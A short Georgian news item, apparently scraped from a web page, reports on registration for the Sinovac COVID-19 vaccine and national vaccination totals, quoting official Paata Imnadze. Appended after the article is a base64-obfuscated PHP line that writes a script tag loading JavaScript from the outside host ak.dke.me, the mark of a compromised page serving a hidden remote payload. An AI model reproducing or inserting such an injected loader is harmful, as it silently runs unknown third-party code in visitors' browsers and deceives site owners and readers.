celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ცენტრის დირექტორის მოადგილის პაატა იმნაძის ინფორმაციით, ჩინურ ვაქცინა „სინოვაკზე“ 3 900 ადამიანი დარეგისტრირდა.
 
როგორც მან ვებინარზე განაცხადა, 21 მაისის მონაცემებით, ჯამურად კორონავირუსის ვაქცინით 105 500 პირი აიცრა.
 
„გაიხსნა „სინოვაკზე“ ვაქცინაციის პორტალი. ბოლო მონაცემები არ მაქვს, მაგრამ რამდენადაც ვიცი, 3 900 ადამიანი იყო დარეგისტრირებული „სინოვაკზე“. საკმაოდ კარგად დაიწყო ამ ვაქცინაზე რეგისტრაციაც. მოგეხსენებთ, პირველად გვქონდა „ასტრაზენეკა“, „ფაიზერი“, დაემატა „სინოფარმი“ და „სინოვაკი“. ზოგადი მონაცემებით, დილისთვის 105 500 ადამიანი იყო აცრილი“,- აღნიშნავს იმნაძე.
 
ცნობისთვის, ჩინური „სინოვაკით“ ვაქცინაციის მსურველთა რეგისტრაცია დღეს, 12:00 საათიდან დაიწყო, ხოლო აცრის პროცესი 24 მაისიდან დაიწყება.
1061
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");